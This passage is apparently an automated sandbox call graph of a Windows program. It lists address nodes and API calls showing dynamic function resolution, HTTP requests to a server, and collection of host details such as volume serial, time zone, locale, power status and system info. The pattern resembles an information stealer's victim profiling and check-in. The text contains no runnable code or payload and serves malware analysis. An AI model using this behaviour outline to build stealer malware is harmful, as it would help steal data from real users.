af3d8e 14168->14169 14170 af45c0 2 API calls 14169->14170 14171 af3da7 14170->14171 14172 af45c0 2 API calls 14171->14172 14173 af3dc0 14172->14173 14174 af45c0 2 API calls 14173->14174 14175 af3dd9 14174->14175 14176 af45c0 2 API calls 14175->14176 14177 af3df2 14176->14177 14178 af45c0 2 API calls 14177->14178 14179 af3e0b 14178->14179 14180 af45c0 2 API calls 14179->14180 14181 af3e24 14180->14181 14182 af45c0 2 API calls 14181->14182 14183 af3e3d 14182->14183 14184 af45c0 2 API calls 14183->14184 14185 af3e56 14184->14185 14186 af45c0 2 API calls 14185->14186 14187 af3e6f 14186->14187 14188 af45c0 2 API calls 14187->14188 14189 af3e88 14188->14189 14190 af45c0 2 API calls 14189->14190 14191 af3ea1 14190->14191 14192 af45c0 2 API calls 14191->14192 14193 af3eba 14192->14193 14194 af45c0 2 API calls 14193->14194 14195 af3ed3 14194->14195 14196 af45c0 2 API calls 14195->14196 14197 af3eec 14196->14197 14198 af45c0 2 API calls 14197->14198 14199 af3f05 14198->14199 14200 af45c0 2 API calls 14199->14200 14201 af3f1e 14200->14201 14202 af45c0 2 API calls 14201->14202 14203 af3f37 14202->14203 14204 af45c0 2 API calls 14203->14204 14205 af3f50 14204->14205 14206 af45c0 2 API calls 14205->14206 14207 af3f69 14206->14207 14208 af45c0 2 API calls 14207->14208 14209 af3f82 14208->14209 14210 af45c0 2 API calls 14209->14210 14211 af3f9b 14210->14211 14212 af45c0 2 API calls 14211->14212 14213 af3fb4 14212->14213 14214 af45c0 2 API calls 14213->14214 14215 af3fcd 14214->14215 14216 af45c0 2 API calls 14215->14216 14217 af3fe6 14216->14217 14218 af45c0 2 API calls 14217->14218 14219 af3fff 14218->14219 14220 af45c0 2 API calls 14219->14220 14221 af4018 14220->14221 14222 af45c0 2 API calls 14221->14222 14223 af4031 14222->14223 14224 af45c0 2 API calls 14223->14224 14225 af404a 14224->14225 14226 af45c0 2 API calls 14225->14226 14227 af4063 14226->14227 14228 af45c0 2 API calls 14227->14228 14229 af407c 14228->14229 14230 af45c0 2 API calls 14229->14230 14231 af4095 14230->14231 14232 af45c0 2 API calls 14231->14232 14233 af40ae 14232->14233 14234 af45c0 2 API calls 14233->14234 14235 af40c7 14234->14235 14236 af45c0 2 API calls 14235->14236 14237 af40e0 14236->14237 14238 af45c0 2 API calls 14237->14238 14239 af40f9 14238->14239 14240 af45c0 2 API calls 14239->14240 14241 af4112 14240->14241 14242 af45c0 2 API calls 14241->14242 14243 af412b 14242->14243 14244 af45c0 2 API calls 14243->14244 14245 af4144 14244->14245 14246 af45c0 2 API calls 14245->14246 14247 af415d 14246->14247 14248 af45c0 2 API calls 14247->14248 14249 af4176 14248->14249 14250 af45c0 2 API calls 14249->14250 14251 af418f 14250->14251 14252 af45c0 2 API calls 14251->14252 14253 af41a8 14252->14253 14254 af45c0 2 API calls 14253->14254 14255 af41c1 14254->14255 14256 af45c0 2 API calls 14255->14256 14257 af41da 14256->14257 14258 af45c0 2 API calls 14257->14258 14259 af41f3 14258->14259 14260 af45c0 2 API calls 14259->14260 14261 af420c 14260->14261 14262 af45c0 2 API calls 14261->14262 14263 af4225 14262->14263 14264 af45c0 2 API calls 14263->14264 14265 af423e 14264->14265 14266 af45c0 2 API calls 14265->14266 14267 af4257 14266->14267 14268 af45c0 2 API calls 14267->14268 14269 af4270 14268->14269 14270 af45c0 2 API calls 14269->14270 14271 af4289 14270->14271 14272 af45c0 2 API calls 14271->14272 14273 af42a2 14272->14273 14274 af45c0 2 API calls 14273->14274 14275 af42bb 14274->14275 14276 af45c0 2 API calls 14275->14276 14277 af42d4 14276->14277 14278 af45c0 2 API calls 14277->14278 14279 af42ed 14278->14279 14280 af45c0 2 API calls 14279->14280 14281 af4306 14280->14281 14282 af45c0 2 API calls 14281->14282 14283 af431f 14282->14283 14284 af45c0 2 API calls 14283->14284 14285 af4338 14284->14285 14286 af45c0 2 API calls 14285->14286 14287 af4351 14286->14287 14288 af45c0 2 API calls 14287->14288 14289 af436a 14288->14289 14290 af45c0 2 API calls 14289->14290 14291 af4383 14290->14291 14292 af45c0 2 API calls 14291->14292 14293 af439c 14292->14293 14294 af45c0 2 API calls 14293->14294 14295 af43b5 14294->14295 14296 af45c0 2 API calls 14295->14296 14297 af43ce 14296->14297 14298 af45c0 2 API calls 14297->14298 14299 af43e7 14298->14299 14300 af45c0 2 API calls 14299->14300 14301 af4400 14300->14301 14302 af45c0 2 API calls 14301->14302 14303 af4419 14302->14303 14304 af45c0 2 API calls 14303->14304 14305 af4432 14304->14305 14306 af45c0 2 API calls 14305->14306 14307 af444b 14306->14307 14308 af45c0 2 API calls 14307->14308 14309 af4464 14308->14309 14310 af45c0 2 API calls 14309->14310 14311 af447d 14310->14311 14312 af45c0 2 API calls 14311->14312 14313 af4496 14312->14313 14314 af45c0 2 API calls 14313->14314 14315 af44af 14314->14315 14316 af45c0 2 API calls 14315->14316 14317 af44c8 14316->14317 14318 af45c0 2 API calls 14317->14318 14319 af44e1 14318->14319 14320 af45c0 2 API calls 14319->14320 14321 af44fa 14320->14321 14322 af45c0 2 API calls 14321->14322 14323 af4513 14322->14323 14324 af45c0 2 API calls 14323->14324 14325 af452c 14324->14325 14326 af45c0 2 API calls 14325->14326 14327 af4545 14326->14327 14328 af45c0 2 API calls 14327->14328 14329 af455e 14328->14329 14330 af45c0 2 API calls 14329->14330 14331 af4577 14330->14331 14332 af45c0 2 API calls 14331->14332 14333 af4590 14332->14333 14334 af45c0 2 API calls 14333->14334 14335 af45a9 14334->14335 14336 b09c10 14335->14336 14337 b09c20 43 API calls 14336->14337 14338 b0a036 8 API calls 14336->14338 14337->14338 14339 b0a146 14338->14339 14340 b0a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14338->14340 14341 b0a153 8 API calls 14339->14341 14342 b0a216 14339->14342 14340->14339 14341->14342 14343 b0a298 14342->14343 14344 b0a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14342->14344 14345 b0a2a5 6 API calls 14343->14345 14346 b0a337 14343->14346 14344->14343 14345->14346 14347 b0a344 9 API calls 14346->14347 14348 b0a41f 14346->14348 14347->14348 14349 b0a4a2 14348->14349 14350 b0a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14348->14350 14351 b0a4ab GetProcAddress GetProcAddress 14349->14351 14352 b0a4dc 14349->14352 14350->14349 14351->14352 14353 b0a515 14352->14353 14354 b0a4e5 GetProcAddress GetProcAddress 14352->14354 14355 b0a612 14353->14355 14356 b0a522 10 API calls 14353->14356 14354->14353 14357 b0a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14355->14357 14358 b0a67d 14355->14358 14356->14355 14357->14358 14359 b0a686 GetProcAddress 14358->14359 14360 b0a69e 14358->14360 14359->14360 14361 b0a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14360->14361 14362 b05ca3 14360->14362 14361->14362 14363 af1590 14362->14363 15484 af1670 14363->15484 14366 b0a7a0 lstrcpy 14367 af15b5 14366->14367 14368 b0a7a0 lstrcpy 14367->14368 14369 af15c7 14368->14369 14370 b0a7a0 lstrcpy 14369->14370 14371 af15d9 14370->14371 14372 b0a7a0 lstrcpy 14371->14372 14373 af1663 14372->14373 14374 b05510 14373->14374 14375 b05521 14374->14375 14376 b0a820 2 API calls 14375->14376 14377 b0552e 14376->14377 14378 b0a820 2 API calls 14377->14378 14379 b0553b 14378->14379 14380 b0a820 2 API calls 14379->14380 14381 b05548 14380->14381 14382 b0a740 lstrcpy 14381->14382 14383 b05555 14382->14383 14384 b0a740 lstrcpy 14383->14384 14385 b05562 14384->14385 14386 b0a740 lstrcpy 14385->14386 14387 b0556f 14386->14387 14388 b0a740 lstrcpy 14387->14388 14390 b0557c 14388->14390 14389 af1590 lstrcpy 14389->14390 14390->14389 14391 b05643 StrCmpCA 14390->14391 14392 b056a0 StrCmpCA 14390->14392 14398 b05856 StrCmpCA 14390->14398 14401 b0a740 lstrcpy 14390->14401 14402 b0a8a0 lstrcpy 14390->14402 14407 b0a820 lstrlen lstrcpy 14390->14407 14410 b05a0b StrCmpCA 14390->14410 14411 b0a7a0 lstrcpy 14390->14411 14421 b052c0 25 API calls 14390->14421 14424 b0578a StrCmpCA 14390->14424 14426 b0593f StrCmpCA 14390->14426 14427 b051f0 20 API calls 14390->14427 14391->14390 14392->14390 14393 b057dc 14392->14393 14394 b0a8a0 lstrcpy 14393->14394 14395 b057e8 14394->14395 14396 b0a820 2 API calls 14395->14396 14397 b057f6 14396->14397 14399 b0a820 2 API calls 14397->14399 14398->14390 14400 b05991 14398->14400 14404 b05805 14399->14404 14403 b0a8a0 lstrcpy 14400->14403 14401->14390 14402->14390 14405 b0599d 14403->14405 14406 af1670 lstrcpy 14404->14406 14408 b0a820 2 API calls 14405->14408 14428 b05811 14406->14428 14407->14390 14409 b059ab 14408->14409 14412 b0a820 2 API calls 14409->14412 14413 b05a16 Sleep 14410->14413 14414 b05a28 14410->14414 14411->14390 14416 b059ba 14412->14416 14413->14390 14415 b0a8a0 lstrcpy 14414->14415 14417 b05a34 14415->14417 14418 af1670 lstrcpy 14416->14418 14419 b0a820 2 API calls 14417->14419 14418->14428 14420 b05a43 14419->14420 14422 b0a820 2 API calls 14420->14422 14421->14390 14423 b05a52 14422->14423 14425 af1670 lstrcpy 14423->14425 14424->14390 14425->14428 14426->14390 14427->14390 14428->13481 14430 b07553 GetVolumeInformationA 14429->14430 14431 b0754c 14429->14431 14432 b07591 14430->14432 14431->14430 14433 b075fc GetProcessHeap RtlAllocateHeap 14432->14433 14434 b07628 wsprintfA 14433->14434 14435 b07619 14433->14435 14437 b0a740 lstrcpy 14434->14437 14436 b0a740 lstrcpy 14435->14436 14438 b05da7 14436->14438 14437->14438 14438->13502 14440 b0a7a0 lstrcpy 14439->14440 14441 af4899 14440->14441 15493 af47b0 14441->15493 14443 af48a5 14444 b0a740 lstrcpy 14443->14444 14445 af48d7 14444->14445 14446 b0a740 lstrcpy 14445->14446 14447 af48e4 14446->14447 14448 b0a740 lstrcpy 14447->14448 14449 af48f1 14448->14449 14450 b0a740 lstrcpy 14449->14450 14451 af48fe 14450->14451 14452 b0a740 lstrcpy 14451->14452 14453 af490b InternetOpenA StrCmpCA 14452->14453 14454 af4944 14453->14454 14455 af4ecb InternetCloseHandle 14454->14455 15499 b08b60 14454->15499 14457 af4ee8 14455->14457 15514 af9ac0 CryptStringToBinaryA 14457->15514 14458 af4963 15507 b0a920 14458->15507 14461 af4976 14463 b0a8a0 lstrcpy 14461->14463 14468 af497f 14463->14468 14464 b0a820 2 API calls 14465 af4f05 14464->14465 14467 b0a9b0 4 API calls 14465->14467 14466 af4f27 ctype 14470 b0a7a0 lstrcpy 14466->14470 14469 af4f1b 14467->14469 14472 b0a9b0 4 API calls 14468->14472 14471 b0a8a0 lstrcpy 14469->14471 14483 af4f57 14470->14483 14471->14466 14473 af49a9 14472->14473 14474 b0a8a0 lstrcpy 14473->14474 14475 af49b2 14474->14475 14476 b0a9b0 4 API calls 14475->14476 14477 af49d1 14476->14477 14478 b0a8a0 lstrcpy 14477->14478 14479 af49da 14478->14479 14480 b0a920 3 API calls 14479->14480 14481 af49f8 14480->14481 14482 b0a8a0 lstrcpy 14481->14482 14484 af4a01 14482->14484 14483->13505 14485 b0a9b0 4 API calls 14484->14485 14486 af4a20 14485->14486 14487 b0a8a0 lstrcpy 14486->14487 14488 af4a29 14487->14488 14489 b0a9b0 4 API calls 14488->14489 14490 af4a48 14489->14490 14491 b0a8a0 lstrcpy 14490->14491 14492 af4a51 14491->14492 14493 b0a9b0 4 API calls 14492->14493 14494 af4a7d 14493->14494 14495 b0a920 3 API calls 14494->14495 14496 af4a84 14495->14496 14497 b0a8a0 lstrcpy 14496->14497 14498 af4a8d 14497->14498 14499 af4aa3 InternetConnectA 14498->14499 14499->14455 14500 af4ad3 HttpOpenRequestA 14499->14500 14502 af4ebe InternetCloseHandle 14500->14502 14503 af4b28 14500->14503 14502->14455 14504 b0a9b0 4 API calls 14503->14504 14505 af4b3c 14504->14505 14506 b0a8a0 lstrcpy 14505->14506 14507 af4b45 14506->14507 14508 b0a920 3 API calls 14507->14508 14509 af4b63 14508->14509 14510 b0a8a0 lstrcpy 14509->14510 14511 af4b6c 14510->14511 14512 b0a9b0 4 API calls 14511->14512 14513 af4b8b 14512->14513 14514 b0a8a0 lstrcpy 14513->14514 14515 af4b94 14514->14515 14516 b0a9b0 4 API calls 14515->14516 14517 af4bb5 14516->14517 14518 b0a8a0 lstrcpy 14517->14518 14519 af4bbe 14518->14519 14520 b0a9b0 4 API calls 14519->14520 14521 af4bde 14520->14521 14522 b0a8a0 lstrcpy 14521->14522 14523 af4be7 14522->14523 14524 b0a9b0 4 API calls 14523->14524 14525 af4c06 14524->14525 14526 b0a8a0 lstrcpy 14525->14526 14527 af4c0f 14526->14527 14528 b0a920 3 API calls 14527->14528 14529 af4c2d 14528->14529 14530 b0a8a0 lstrcpy 14529->14530 14531 af4c36 14530->14531 14532 b0a9b0 4 API calls 14531->14532 14533 af4c55 14532->14533 14534 b0a8a0 lstrcpy 14533->14534 14535 af4c5e 14534->14535 14536 b0a9b0 4 API calls 14535->14536 14537 af4c7d 14536->14537 14538 b0a8a0 lstrcpy 14537->14538 14539 af4c86 14538->14539 14540 b0a920 3 API calls 14539->14540 14541 af4ca4 14540->14541 14542 b0a8a0 lstrcpy 14541->14542 14543 af4cad 14542->14543 14544 b0a9b0 4 API calls 14543->14544 14545 af4ccc 14544->14545 14546 b0a8a0 lstrcpy 14545->14546 14547 af4cd5 14546->14547 14548 b0a9b0 4 API calls 14547->14548 14549 af4cf6 14548->14549 14550 b0a8a0 lstrcpy 14549->14550 14551 af4cff 14550->14551 14552 b0a9b0 4 API calls 14551->14552 14553 af4d1f 14552->14553 14554 b0a8a0 lstrcpy 14553->14554 14555 af4d28 14554->14555 14556 b0a9b0 4 API calls 14555->14556 14557 af4d47 14556->14557 14558 b0a8a0 lstrcpy 14557->14558 14559 af4d50 14558->14559 14560 b0a920 3 API calls 14559->14560 14561 af4d6e 14560->14561 14562 b0a8a0 lstrcpy 14561->14562 14563 af4d77 14562->14563 14564 b0a740 lstrcpy 14563->14564 14565 af4d92 14564->14565 14566 b0a920 3 API calls 14565->14566 14567 af4db3 14566->14567 14568 b0a920 3 API calls 14567->14568 14569 af4dba 14568->14569 14570 b0a8a0 lstrcpy 14569->14570 14571 af4dc6 14570->14571 14572 af4de7 lstrlen 14571->14572 14573 af4dfa 14572->14573 14574 af4e03 lstrlen 14573->14574 15513 b0aad0 14574->15513 14576 af4e13 HttpSendRequestA 14577 af4e32 InternetReadFile 14576->14577 14578 af4e67 InternetCloseHandle 14577->14578 14583 af4e5e 14577->14583 14580 b0a800 14578->14580 14580->14502 14581 b0a9b0 4 API calls 14581->14583 14582 b0a8a0 lstrcpy 14582->14583 14583->14577 14583->14578 14583->14581 14583->14582 15520 b0aad0 14584->15520 14586 b017c4 StrCmpCA 14587 b017cf ExitProcess 14586->14587 14598 b017d7 14586->14598 14588 b019c2 14588->13507 14589 b01970 StrCmpCA 14589->14598 14590 b018f1 StrCmpCA 14590->14598 14591 b01951 StrCmpCA 14591->14598 14592 b01932 StrCmpCA 14592->14598 14593 b01913 StrCmpCA 14593->14598 14594 b0185d StrCmpCA 14594->14598 14595 b0187f StrCmpCA 14595->14598 14596 b018ad StrCmpCA 14596->14598 14597 b018cf StrCmpCA 14597->14598 14598->14588 14598->14589 14598->14590 14598->14591 14598->14592 14598->14593 14598->14594 14598->14595 14598->14596 14598->14597 14599 b0a820 lstrlen lstrcpy 14598->14599 14599->14598 14601 b0a7a0 lstrcpy 14600->14601 14602 af5979 14601->14602 14603 af47b0 2 API calls 14602->14603 14604 af5985 14603->14604 14605 b0a740 lstrcpy 14604->14605 14606 af59ba 14605->14606 14607 b0a740 lstrcpy 14606->14607 14608 af59c7 14607->14608 14609 b0a740 lstrcpy 14608->14609 14610 af59d4 14609->14610 14611 b0a740 lstrcpy 14610->14611 14612 af59e1 14611->14612 14613 b0a740 lstrcpy 14612->14613 14614 af59ee InternetOpenA StrCmpCA 14613->14614 14615 af5a1d 14614->14615 14616 af5fc3 InternetCloseHandle 14615->14616 14617 b08b60 3 API calls 14615->14617 14618 af5fe0 14616->14618 14619 af5a3c 14617->14619 14621 af9ac0 4 API calls 14618->14621 14620 b0a920 3 API calls 14619->14620 14622 af5a4f 14620->14622 14623 af5fe6 14621->14623 14624 b0a8a0 lstrcpy 14622->14624 14625 b0a820 2 API calls 14623->14625 14627 af601f ctype 14623->14627 14629 af5a58 14624->14629 14626 af5ffd 14625->14626 14628 b0a9b0 4 API calls 14626->14628 14632 b0a7a0 lstrcpy 14627->14632 14630 af6013 14628->14630 14633 b0a9b0 4 API calls 14629->14633 14631 b0a8a0 lstrcpy 14630->14631 14631->14627 14641 af604f 14632->14641 14634 af5a82 14633->14634 14635 b0a8a0 lstrcpy 14634->14635 14636 af5a8b 14635->14636 14637 b0a9b0 4 API calls 14636->14637 14638 af5aaa 14637->14638 14639 b0a8a0 lstrcpy 14638->14639 14640 af5ab3 14639->14640 14642 b0a920 3 API calls 14640->14642 14641->13513 14643 af5ad1 14642->14643 14644 b0a8a0 lstrcpy 14643->14644 14645 af5ada 14644->14645 14646 b0a9b0 4 API calls 14645->14646 14647 af5af9 14646->14647 14648 b0a8a0 lstrcpy 14647->14648 14649 af5b02 14648->14649 14650 b0a9b0 4 API calls 14649->14650 14651 af5b21 14650->14651 14652 b0a8a0 lstrcpy 14651->14652 14653 af5b2a 14652->14653 14654 b0a9b0 4 API calls 14653->14654 14655 af5b56 14654->14655 14656 b0a920 3 API calls 14655->14656 14657 af5b5d 14656->14657 14658 b0a8a0 lstrcpy 14657->14658 14659 af5b66 14658->14659 14660 af5b7c InternetConnectA 14659->14660 14660->14616 14661 af5bac HttpOpenRequestA 14660->14661 14663 af5c0b 14661->14663 14664 af5fb6 InternetCloseHandle 14661->14664 14665 b0a9b0 4 API calls 14663->14665 14664->14616 14666 af5c1f 14665->14666 14667 b0a8a0 lstrcpy 14666->14667 14668 af5c28 14667->14668 14669 b0a920 3 API calls 14668->14669 14670 af5c46 14669->14670 14671 b0a8a0 lstrcpy 14670->14671 14672 af5c4f 14671->14672 14673 b0a9b0 4 API calls 14672->14673 14674 af5c6e 14673->14674 14675 b0a8a0 lstrcpy 14674->14675 14676 af5c77 14675->14676 14677 b0a9b0 4 API calls 14676->14677 14678 af5c98 14677->14678 14679 b0a8a0 lstrcpy 14678->14679 14680 af5ca1 14679->14680 14681 b0a9b0 4 API calls 14680->14681 14682 af5cc1 14681->14682 14683 b0a8a0 lstrcpy 14682->14683 14684 af5cca 14683->14684 14685 b0a9b0 4 API calls 14684->14685 14686 af5ce9 14685->14686 14687 b0a8a0 lstrcpy 14686->14687 14688 af5cf2 14687->14688 14689 b0a920 3 API calls 14688->14689 14690 af5d10 14689->14690 14691 b0a8a0 lstrcpy 14690->14691 14692 af5d19 14691->14692 14693 b0a9b0 4 API calls 14692->14693 14694 af5d38 14693->14694 14695 b0a8a0 lstrcpy 14694->14695 14696 af5d41 14695->14696 14697 b0a9b0 4 API calls 14696->14697 14698 af5d60 14697->14698 14699 b0a8a0 lstrcpy 14698->14699 14700 af5d69 14699->14700 14701 b0a920 3 API calls 14700->14701 14702 af5d87 14701->14702 14703 b0a8a0 lstrcpy 14702->14703 14704 af5d90 14703->14704 14705 b0a9b0 4 API calls 14704->14705 14706 af5daf 14705->14706 14707 b0a8a0 lstrcpy 14706->14707 14708 af5db8 14707->14708 14709 b0a9b0 4 API calls 14708->14709 14710 af5dd9 14709->14710 14711 b0a8a0 lstrcpy 14710->14711 14712 af5de2 14711->14712 14713 b0a9b0 4 API calls 14712->14713 14714 af5e02 14713->14714 14715 b0a8a0 lstrcpy 14714->14715 14716 af5e0b 14715->14716 14717 b0a9b0 4 API calls 14716->14717 14718 af5e2a 14717->14718 14719 b0a8a0 lstrcpy 14718->14719 14720 af5e33 14719->14720 14721 b0a920 3 API calls 14720->14721 14722 af5e54 14721->14722 14723 b0a8a0 lstrcpy 14722->14723 14724 af5e5d 14723->14724 14725 af5e70 lstrlen 14724->14725 15521 b0aad0 14725->15521 14727 af5e81 lstrlen GetProcessHeap RtlAllocateHeap 15522 b0aad0 14727->15522 14729 af5eae lstrlen 14730 af5ebe 14729->14730 14731 af5ed7 lstrlen 14730->14731 14732 af5ee7 14731->14732 14733 af5ef0 lstrlen 14732->14733 14734 af5f03 14733->14734 14735 af5f1a lstrlen 14734->14735 15523 b0aad0 14735->15523 14737 af5f2a HttpSendRequestA 14738 af5f35 InternetReadFile 14737->14738 14739 af5f6a InternetCloseHandle 14738->14739 14743 af5f61 14738->14743 14739->14664 14741 b0a9b0 4 API calls 14741->14743 14742 b0a8a0 lstrcpy 14742->14743 14743->14738 14743->14739 14743->14741 14743->14742 14746 b01077 14744->14746 14745 b01151 14745->13515 14746->14745 14747 b0a820 lstrlen lstrcpy 14746->14747 14747->14746 14750 b00db7 14748->14750 14749 b00f17 14749->13523 14750->14749 14751 b00ea4 StrCmpCA 14750->14751 14752 b00e27 StrCmpCA 14750->14752 14753 b00e67 StrCmpCA 14750->14753 14754 b0a820 lstrlen lstrcpy 14750->14754 14751->14750 14752->14750 14753->14750 14754->14750 14759 b00f67 14755->14759 14756 b01044 14756->13531 14757 b00fb2 StrCmpCA 14757->14759 14758 b0a820 lstrlen lstrcpy 14758->14759 14759->14756 14759->14757 14759->14758 14761 b0a740 lstrcpy 14760->14761 14762 b01a26 14761->14762 14763 b0a9b0 4 API calls 14762->14763 14764 b01a37 14763->14764 14765 b0a8a0 lstrcpy 14764->14765 14766 b01a40 14765->14766 14767 b0a9b0 4 API calls 14766->14767 14768 b01a5b 14767->14768 14769 b0a8a0 lstrcpy 14768->14769 14770 b01a64 14769->14770 14771 b0a9b0 4 API calls 14770->14771 14772 b01a7d 14771->14772 14773 b0a8a0 lstrcpy 14772->14773 14774 b01a86 14773->14774 14775 b0a9b0 4 API calls 14774->14775 14776 b01aa1 14775->14776 14777 b0a8a0 lstrcpy 14776->14777 14778 b01aaa 14777->14778 14779 b0a9b0 4 API calls 14778->14779 14780 b01ac3 14779->14780 14781 b0a8a0 lstrcpy 14780->14781 14782 b01acc 14781->14782 14783 b0a9b0 4 API calls 14782->14783 14784 b01ae7 14783->14784 14785 b0a8a0 lstrcpy 14784->14785 14786 b01af0 14785->14786 14787 b0a9b0 4 API calls 14786->14787 14788 b01b09 14787->14788 14789 b0a8a0 lstrcpy 14788->14789 14790 b01b12 14789->14790 14791 b0a9b0 4 API calls 14790->14791 14792 b01b2d 14791->14792 14793 b0a8a0 lstrcpy 14792->14793 14794 b01b36 14793->14794 14795 b0a9b0 4 API calls 14794->14795 14796 b01b4f 14795->14796 14797 b0a8a0 lstrcpy 14796->14797 14798 b01b58 14797->14798 14799 b0a9b0 4 API calls 14798->14799 14800 b01b76 14799->14800 14801 b0a8a0 lstrcpy 14800->14801 14802 b01b7f 14801->14802 14803 b07500 6 API calls 14802->14803 14804 b01b96 14803->14804 14805 b0a920 3 API calls 14804->14805 14806 b01ba9 14805->14806 14807 b0a8a0 lstrcpy 14806->14807 14808 b01bb2 14807->14808 14809 b0a9b0 4 API calls 14808->14809 14810 b01bdc 14809->14810 14811 b0a8a0 lstrcpy 14810->14811 14812 b01be5 14811->14812 14813 b0a9b0 4 API calls 14812->14813 14814 b01c05 14813->14814 14815 b0a8a0 lstrcpy 14814->14815 14816 b01c0e 14815->14816 15524 b07690 GetProcessHeap RtlAllocateHeap 14816->15524 14819 b0a9b0 4 API calls 14820 b01c2e 14819->14820 14821 b0a8a0 lstrcpy 14820->14821 14822 b01c37 14821->14822 14823 b0a9b0 4 API calls 14822->14823 14824 b01c56 14823->14824 14825 b0a8a0 lstrcpy 14824->14825 14826 b01c5f 14825->14826 14827 b0a9b0 4 API calls 14826->14827 14828 b01c80 14827->14828 14829 b0a8a0 lstrcpy 14828->14829 14830 b01c89 14829->14830 15531 b077c0 GetCurrentProcess IsWow64Process 14830->15531 14833 b0a9b0 4 API calls 14834 b01ca9 14833->14834 14835 b0a8a0 lstrcpy 14834->14835 14836 b01cb2 14835->14836 14837 b0a9b0 4 API calls 14836->14837 14838 b01cd1 14837->14838 14839 b0a8a0 lstrcpy 14838->14839 14840 b01cda 14839->14840 14841 b0a9b0 4 API calls 14840->14841 14842 b01cfb 14841->14842 14843 b0a8a0 lstrcpy 14842->14843 14844 b01d04 14843->14844 14845 b07850 3 API calls 14844->14845 14846 b01d14 14845->14846 14847 b0a9b0 4 API calls 14846->14847 14848 b01d24 14847->14848 14849 b0a8a0 lstrcpy 14848->14849 14850 b01d2d 14849->14850 14851 b0a9b0 4 API calls 14850->14851 14852 b01d4c 14851->14852 14853 b0a8a0 lstrcpy 14852->14853 14854 b01d55 14853->14854 14855 b0a9b0 4 API calls 14854->14855 14856 b01d75 14855->14856 14857 b0a8a0 lstrcpy 14856->14857 14858 b01d7e 14857->14858 14859 b078e0 3 API calls 14858->14859 14860 b01d8e 14859->14860 14861 b0a9b0 4 API calls 14860->14861 14862 b01d9e 14861->14862 14863 b0a8a0 lstrcpy 14862->14863 14864 b01da7 14863->14864 14865 b0a9b0 4 API calls 14864->14865 14866 b01dc6 14865->14866 14867 b0a8a0 lstrcpy 14866->14867 14868 b01dcf 14867->14868 14869 b0a9b0 4 API calls 14868->14869 14870 b01df0 14869->14870 14871 b0a8a0 lstrcpy 14870->14871 14872 b01df9 14871->14872 15533 b07980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14872->15533 14875 b0a9b0 4 API calls 14876 b01e19 14875->14876 14877 b0a8a0 lstrcpy 14876->14877 14878 b01e22 14877->14878 14879 b0a9b0 4 API calls 14878->14879 14880 b01e41 14879->14880 14881 b0a8a0 lstrcpy 14880->14881 14882 b01e4a 14881->14882 14883 b0a9b0 4 API calls 14882->14883 14884 b01e6b 14883->14884 14885 b0a8a0 lstrcpy 14884->14885 14886 b01e74 14885->14886 15535 b07a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14886->15535 14889 b0a9b0 4 API calls 14890 b01e94 14889->14890 14891 b0a8a0 lstrcpy 14890->14891 14892 b01e9d 14891->14892 14893 b0a9b0 4 API calls 14892->14893 14894 b01ebc 14893->14894 14895 b0a8a0 lstrcpy 14894->14895 14896 b01ec5 14895->14896 14897 b0a9b0 4 API calls 14896->14897 14898 b01ee5 14897->14898 14899 b0a8a0 lstrcpy 14898->14899 14900 b01eee 14899->14900 15538 b07b00 GetUserDefaultLocaleName 14900->15538 14903 b0a9b0 4 API calls 14904 b01f0e 14903->14904 14905 b0a8a0 lstrcpy 14904->14905 14906 b01f17 14905->14906 14907 b0a9b0 4 API calls 14906->14907 14908 b01f36 14907->14908 14909 b0a8a0 lstrcpy 14908->14909 14910 b01f3f 14909->14910 14911 b0a9b0 4 API calls 14910->14911 14912 b01f60 14911->14912 14913 b0a8a0 lstrcpy 14912->14913 14914 b01f69 14913->14914 15542 b07b90 14914->15542 14916 b01f80 14917 b0a920 3 API calls 14916->14917 14918 b01f93 14917->14918 14919 b0a8a0 lstrcpy 14918->14919 14920 b01f9c 14919->14920 14921 b0a9b0 4 API calls 14920->14921 14922 b01fc6 14921->14922 14923 b0a8a0 lstrcpy 14922->14923 14924 b01fcf 14923->14924 14925 b0a9b0 4 API calls 14924->14925 14926 b01fef 14925->14926 14927 b0a8a0 lstrcpy 14926->14927 14928 b01ff8 14927->14928 15554 b07d80 GetSystemPowerStatus 14928->15554 14931 b0a9b0 4 API calls 14932 b02018 14931->14932 14933 b0a8a0 lstrcpy 14932->14933 14934 b02021 14933->14934 14935 b0a9b0 4 API calls 14934->14935 14936 b02040 14935->14936 14937 b0a8a0 lstrcpy 14936->14937 14938 b02049 14937->14938 14939 b0a9b0 4 API calls 14938->14939 14940 b0206a 14939->14940 14941 b0a8a0 lstrcpy 14940->14941 14942 b02073 14941->14942 14943 b0207e GetCurrentProcessId 14942->14943 15556 b09470 OpenProcess 14943->15556 14946 b0a920 3 API calls 14947 b020a4 14946->14947 14948 b0a8a0 lstrcpy 14947->14948 14949 b020ad 14948->14949 14950 b0a9b0 4 API calls 14949->14950 14951 b020d7 14950->14951 14952 b0a8a0 lstrcpy 14951->14952 14953 b020e0 14952->14953 14954 b0a9b0 4 API calls 14953->14954 14955 b02100 14954->14955 14956 b0a8a0 lstrcpy 14955->14956 14957 b02109 14956->14957 15561 b07e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14957->15561 14960 b0a9b0 4 API calls 14961 b02129 14960->14961 14962 b0a8a0 lstrcpy 14961->14962 14963 b02132 14962->14963 14964 b0a9b0 4 API calls 14963->14964 14965 b02151 14964->14965 14966 b0a8a0 lstrcpy 14965->14966 14967 b0215a 14966->14967 14968 b0a9b0 4 API calls 14967->14968 14969 b0217b 14968->14969 14970 b0a8a0 lstrcpy 14969->14970 14971 b02184 14970->14971 15565 b07f60 14971->15565 14974 b0a9b0 4 API calls 14975 b021a4 14974->14975 14976 b0a8a0 lstrcpy 14975->14976 14977 b021ad 14976->14977 14978 b0a9b0 4 API calls 14977->14978 14979 b021cc 14978->14979 14980 b0a8a0 lstrcpy 14979->14980 14981 b021d5 14980->14981 14982 b0a9b0 4 API calls 14981->14982 14983 b021f6 14982->14983 14984 b0a8a0 lstrcpy 14983->14984 14985 b021ff 14984->14985 15578 b07ed0 GetSystemInfo wsprintfA 14985->15578 14988 b0a9b0 4 API calls 14989 b0221f 14988->14989 14990 b0a8a0 lstrcpy 14989->14990 14991 b02228 14990->14991 14992 